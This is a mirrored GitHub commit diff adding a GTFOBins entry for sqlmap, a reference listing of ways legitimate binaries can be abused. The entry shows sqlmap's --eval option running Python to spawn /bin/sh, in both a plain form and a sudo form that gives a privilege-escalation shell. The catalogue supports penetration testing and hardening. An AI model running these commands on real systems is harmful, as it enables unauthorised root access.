mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 17:44:49 +02:00
8
_gtfobins/sqlmap.md
Normal file
8
_gtfobins/sqlmap.md
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
---
|
||||||
|
description: This allows to execute [`python`](/gtfobins/python/) code, other functions may apply.
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
|
||||||
|
sudo:
|
||||||
|
- code: sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
|
||||||
|
---
|
Reference in New Issue
Block a user